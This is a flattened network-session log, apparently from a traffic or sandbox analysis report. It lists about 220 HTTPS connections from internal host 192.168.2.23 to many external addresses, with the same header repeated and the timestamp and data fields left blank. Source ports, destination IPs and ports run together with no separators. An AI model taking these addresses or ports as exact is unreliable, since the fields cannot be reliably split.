                                                18589192.168.2.2334414149.4.182.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18590192.168.2.234165268.145.177.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18591192.168.2.233565839.179.156.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18592192.168.2.233785486.159.167.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18593192.168.2.2338064209.68.220.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18594192.168.2.233346870.202.74.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18595192.168.2.233590443.162.42.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18596192.168.2.23468545.145.167.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18597192.168.2.2337424100.160.214.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18598192.168.2.2345210118.133.124.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18599192.168.2.23466702.91.148.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18600192.168.2.2354188164.135.8.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18601192.168.2.233705039.121.220.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18602192.168.2.2346288123.37.219.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18603192.168.2.234147660.226.212.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18604192.168.2.2358164223.253.255.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18605192.168.2.2343006199.66.49.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18606192.168.2.235044694.227.38.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18607192.168.2.2347476113.211.145.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18608192.168.2.234660044.230.209.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18609192.168.2.233614065.138.72.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18610192.168.2.2339712179.194.164.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18611192.168.2.2335334180.55.99.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18612192.168.2.233306827.11.146.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18613192.168.2.234206634.228.239.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18614192.168.2.2337756169.170.96.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18615192.168.2.234868658.118.115.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18616192.168.2.235048649.137.164.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18617192.168.2.2348854211.136.100.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18618192.168.2.234210078.199.56.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18619192.168.2.2350492155.192.248.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18620192.168.2.2349952197.247.207.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18621192.168.2.233431252.118.10.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18622192.168.2.236014074.145.73.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18623192.168.2.235330257.102.178.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18624192.168.2.2343284178.103.91.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18625192.168.2.234645824.166.238.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18626192.168.2.236083845.225.8.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18627192.168.2.235345044.84.96.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18628192.168.2.2345676189.73.7.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18629192.168.2.2345612222.82.100.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18630192.168.2.235371642.64.20.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18631192.168.2.2336392166.16.183.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18632192.168.2.235884238.110.190.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18633192.168.2.233861094.32.83.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18634192.168.2.2360732198.46.200.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18635192.168.2.2358712110.174.173.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18636192.168.2.2354416174.149.134.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18637192.168.2.2358058120.209.206.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18638192.168.2.233323065.172.194.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18639192.168.2.234232677.232.204.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18640192.168.2.233895251.150.80.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18641192.168.2.233569847.218.76.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18642192.168.2.235032653.63.6.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18643192.168.2.2353134219.31.128.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18644192.168.2.2351996168.120.32.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18645192.168.2.234241083.230.32.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18646192.168.2.2346988196.47.161.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18647192.168.2.234342631.235.250.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18648192.168.2.2356484107.36.83.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18649192.168.2.234492880.127.158.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18650192.168.2.234509453.200.39.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18651192.168.2.2356646137.62.234.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18652192.168.2.2357140222.148.200.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18653192.168.2.235646814.124.26.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18654192.168.2.2350208221.38.146.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18655192.168.2.2355392134.57.175.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18656192.168.2.235771852.71.87.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18657192.168.2.2356384142.51.146.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18658192.168.2.2343822193.146.189.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18659192.168.2.2342426165.214.116.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18660192.168.2.2333378152.82.11.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18661192.168.2.2357868179.222.71.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18662192.168.2.235257680.246.68.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18663192.168.2.2333826159.146.135.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18664192.168.2.234085462.60.56.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18665192.168.2.235409014.157.196.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18666192.168.2.2334262144.87.58.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18667192.168.2.2343618165.95.204.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18668192.168.2.2355368211.187.67.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18669192.168.2.2346144174.13.235.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18670192.168.2.2336706178.64.234.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18671192.168.2.2354370191.16.57.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18672192.168.2.2345660185.185.9.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18673192.168.2.2356988114.39.0.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18674192.168.2.2359824146.209.234.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18675192.168.2.235520088.184.162.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18676192.168.2.2356782130.187.27.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18677192.168.2.2343640178.252.223.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18678192.168.2.2344432150.66.188.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18679192.168.2.2351820152.222.152.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18680192.168.2.2334232218.45.39.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18681192.168.2.235007438.36.227.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18682192.168.2.235446485.180.181.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18683192.168.2.2346984158.114.63.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18684192.168.2.2353798141.169.146.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18685192.168.2.2356924192.95.130.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18686192.168.2.2346934217.39.87.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18687192.168.2.2333416212.145.14.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18688192.168.2.2350686172.1.55.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18689192.168.2.234533053.155.151.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18690192.168.2.235075878.96.88.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18691192.168.2.2350594161.65.243.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18692192.168.2.2359270143.237.76.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18693192.168.2.2358770159.236.102.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18694192.168.2.234036017.27.30.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18695192.168.2.2337416195.153.243.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18696192.168.2.2345272166.45.126.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18697192.168.2.234212618.147.177.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18698192.168.2.235905688.224.233.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18699192.168.2.2357936218.190.130.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18700192.168.2.2348568109.46.230.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18701192.168.2.234305276.223.213.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18702192.168.2.2350278135.233.195.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18703192.168.2.234468613.139.6.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18704192.168.2.2356958212.129.39.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18705192.168.2.2358296164.176.141.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18706192.168.2.2345264175.45.250.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18707192.168.2.2343350205.246.247.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18708192.168.2.235456027.165.226.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18709192.168.2.233326044.156.139.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18710192.168.2.2337776118.174.27.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18711192.168.2.2344474106.220.185.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18712192.168.2.234648298.17.150.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18713192.168.2.233989299.226.254.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18714192.168.2.2346526201.114.54.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18715192.168.2.2337076119.37.217.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18716192.168.2.235091483.50.30.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18717192.168.2.235489657.127.94.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18718192.168.2.234509063.31.247.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18719192.168.2.2343570121.201.124.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18720192.168.2.2334468216.216.141.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18721192.168.2.235223083.130.86.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18722192.168.2.2351602143.123.190.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18723192.168.2.2348016100.222.255.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18724192.168.2.234239683.237.10.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18725192.168.2.233591035.123.183.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18726192.168.2.233638093.238.201.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18727192.168.2.233339827.156.130.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18728192.168.2.233745459.171.73.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18729192.168.2.2333992156.169.98.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18730192.168.2.2335564189.88.204.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18731192.168.2.2358222223.180.26.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18732192.168.2.235978681.55.129.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18733192.168.2.2346610180.127.49.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18734192.168.2.235643271.105.154.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18735192.168.2.2350224220.228.65.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18736192.168.2.235768495.115.90.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18737192.168.2.2352446178.95.245.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18738192.168.2.2345966223.153.207.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18739192.168.2.2337466105.225.35.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18740192.168.2.2333268145.9.95.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18741192.168.2.2350100186.251.224.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18742192.168.2.2360214207.24.131.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18743192.168.2.2335450208.124.165.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18744192.168.2.2344252145.97.122.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18745192.168.2.234024683.2.78.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18746192.168.2.2352152167.225.244.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18747192.168.2.233890881.5.139.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18748192.168.2.23600701.126.117.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18749192.168.2.2344018220.196.23.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18750192.168.2.235128848.146.74.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18751192.168.2.2342724219.28.111.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18752192.168.2.233451838.17.49.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18753192.168.2.2354904197.201.220.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18754192.168.2.233724823.40.213.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18755192.168.2.2348426130.130.30.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18756192.168.2.2346128141.126.176.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18757192.168.2.233689694.11.75.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18758192.168.2.2341882205.143.16.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18759192.168.2.234496458.1.42.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18760192.168.2.2335716219.98.176.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18761192.168.2.2359676210.20.1.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18762192.168.2.2334742157.150.40.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18763192.168.2.2352862140.15.174.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18764192.168.2.233512438.165.133.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18765192.168.2.2344578159.216.96.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18766192.168.2.234823670.42.247.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18767192.168.2.2342050105.228.72.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18768192.168.2.235593881.49.128.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18769192.168.2.2359310158.114.47.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18770192.168.2.2340746147.105.98.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18771192.168.2.23571749.215.216.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18772192.168.2.2333384187.86.177.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18773192.168.2.2349794202.102.99.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18774192.168.2.2359448183.74.215.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18775192.168.2.234031879.26.187.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18776192.168.2.234792058.39.243.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18777192.168.2.2346344196.16.190.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18778192.168.2.234520466.13.146.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18779192.168.2.2358812211.10.204.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18780192.168.2.2336658119.78.143.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18781192.168.2.235159696.160.213.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18782192.168.2.2342452102.14.37.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18783192.168.2.2339084149.140.43.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18784192.168.2.2359746162.188.26.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18785192.168.2.2339554216.58.252.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18786192.168.2.2345574170.138.250.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18787192.168.2.2338770172.54.97.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18788192.168.2.2354216172.228.64.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18789192.168.2.2354594221.40.139.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18790192.168.2.2341778161.91.240.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18791192.168.2.2356668137.30.28.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18792192.168.2.2340914172.120.49.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18793192.168.2.2350874148.50.31.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18794192.168.2.2351360116.2.95.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18795192.168.2.234243835.181.8.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18796192.168.2.2340240153.99.245.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18797192.168.2.236037223.226.141.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18798192.168.2.23331721.107.183.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18799192.168.2.235296419.45.246.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18800192.168.2.2342672141.252.108.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18801192.168.2.235933267.102.79.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18802192.168.2.2343382163.250.250.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18803192.168.2.2337578194.147.38.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18804192.168.2.2351834126.171.255.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18805192.168.2.2338434220.158.225.678080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18806192.168.2.233776047.137.38.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18807192.168.2.2358872210.156.114.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18808192.168.2.2349704150.28.120.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18809192.168.2.2341486109.174.63.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18810192.168.2.235547862.3.164.224443
                                                TimestampBytes transferredDirectionData


